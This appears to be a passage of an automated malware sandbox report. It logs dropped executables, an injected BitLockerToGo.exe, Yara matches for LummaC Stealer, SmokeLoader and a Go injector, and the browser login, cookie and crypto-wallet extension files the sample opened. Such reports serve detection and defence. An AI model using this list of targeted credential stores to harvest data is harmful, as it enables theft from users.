Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6E8A.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6E8A.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\6E8A.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Go Injector

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 10.0.7C81.exe.7ff7d4c00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.7C81.exe.7ff7d4c00000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2860245379.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2960028925.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7C81.exe PID: 5268, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7C81.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 320, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: BitLockerToGo.exe, 0000000E.00000003.3044811089.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: BitLockerToGo.exe, 0000000E.00000003.2985106102.0000000000830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: a%\\ElectronCash.
Source: BitLockerToGo.exe, 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Libertyt
Source: BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 0000000E.00000003.3044811089.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BitLockerToGo.exe, 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: BitLockerToGo.exe, 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 6E8A.exe, 0000000B.00000002.4476671505.0000021F87A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $'{0}' is not a valid KeyStore name.

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
